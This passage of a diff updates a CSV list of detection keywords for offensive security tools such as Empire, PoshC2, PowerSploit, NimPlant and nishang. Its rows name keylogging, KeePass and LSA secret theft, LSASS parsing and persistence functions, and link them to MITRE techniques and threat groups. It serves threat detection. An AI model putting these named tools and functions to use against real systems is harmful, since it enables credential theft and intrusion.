","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-KeystrokeData*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-Keystrokes 
*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-Keystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-Keystrokes*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-killdate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Get-KeePassINIFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeePassXMLFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeystrokeData*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-Keystrokes *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-Keystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-Keystrokes*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-killdate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
"*Get-KIWI_KERBEROS_LOGON_SESSION*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" -"*Get-LastLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-LastLoggedOn*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*getLocalAdm*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*Get-LoggedOnLocal -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-LastLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-LastLoggedOn*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*getLocalAdm*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Get-LoggedOnLocal -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 
APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-LsaRunAsPPLStatus*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-LSASecret*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 